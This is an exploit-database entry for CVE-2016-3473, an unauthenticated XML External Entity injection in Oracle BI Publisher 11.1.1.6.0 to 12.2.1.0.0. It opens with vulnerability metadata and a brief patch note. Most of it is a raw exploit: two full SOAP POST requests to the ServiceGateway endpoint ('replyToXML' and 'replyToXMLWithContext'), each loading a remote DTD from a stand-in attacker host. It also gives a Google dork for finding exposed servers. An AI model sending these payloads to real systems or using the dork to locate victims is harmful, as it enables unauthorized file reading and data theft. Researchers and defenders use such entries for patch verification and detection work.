Oracle BI Publisher (formerly XML Publisher) - XML External Entity Injection w/o authentication

vendor:

Oracle BI Publisher

by:

Jakub Palaczynski

7,7

CVSS

HIGH

XML External Entity Injection

611

CWE

Product Name: Oracle BI Publisher

Affected Version From: 11.1.1.6.0

Affected Version To: 12.2.1.0.0

Patch Exists: YES

Related CWE: CVE-2016-3473

CPE: a:oracle:bi_publisher

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2016

Oracle BI Publisher (formerly XML Publisher) – XML External Entity Injection w/o authentication

Oracle BI Publisher (formerly XML Publisher) is vulnerable to XML External Entity Injection without authentication. This vulnerability can be exploited by sending a specially crafted SOAP request to the vulnerable server. The vulnerable SOAP actions are 'replyToXML' and 'replyToXMLWithContext'. Previous versions of Oracle BI Publisher may also be vulnerable.

Mitigation:

Oracle has released a patch to address this vulnerability. Users should upgrade to the latest version of Oracle BI Publisher.

Source

Exploit-DB raw data:

# Exploit Title: Oracle BI Publisher (formerly XML Publisher) - XML External Entity Injection w/o authentication
# Date: 20\10\2016
# Exploit Author: Jakub Palaczynski
# CVE : CVE-2016-3473
# Vendor Homepage: https://www.oracle.com/
# Version: 11.1.1.6.0, 11.1.1.7.0, 11.1.1.9.0, 12.2.1.0.0
# Info: Previous versions may also be vulnerable.
# Google Dork: inurl:xmlpserver or intitle:"Oracle BI Publisher Enterprise Login"

1. Vulnerable SOAP Action: replyToXML

POST /xmlpserver/services/ServiceGateway HTTP/1.1
Content-Type: text/xml;charset=UTF-8
SOAPAction: #replyToXML
Host: vulnerablehost
Content-Length: 630

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://xmlns.oracle.com/oxp/service/service_gateway">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:replyToXML soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <incomingXML xsi:type="xsd:string"><![CDATA[<?xml version="1.0" encoding="utf-8"?><!DOCTYPE m [ <!ENTITY % remote SYSTEM "http://attacker/file.xml">%remote;]>]]></incomingXML>
      </ser:replyToXML>
   </soapenv:Body>
</soapenv:Envelope>

------------------------------------------------

2. Vulnerable SOAP Action: replyToXMLWithContext

POST /xmlpserver/services/ServiceGateway HTTP/1.1

Content-Type: text/xml;charset=UTF-8

SOAPAction: #replyToXMLWithContext

Host: vulnerablehost

Content-Length: 646



<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://xmlns.oracle.com/oxp/service/service_gateway">

   <soapenv:Header/>

   <soapenv:Body>

      <ser:replyToXMLWithContext soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">

         <incomingXML xsi:type="xsd:string"><![CDATA[<?xml version="1.0" encoding="utf-8"?><!DOCTYPE m [ <!ENTITY % remote SYSTEM "http://attacker/file.xml">%remote;]>]]></incomingXML>

      </ser:replyToXMLWithContext>

   </soapenv:Body>

</soapenv:Envelope>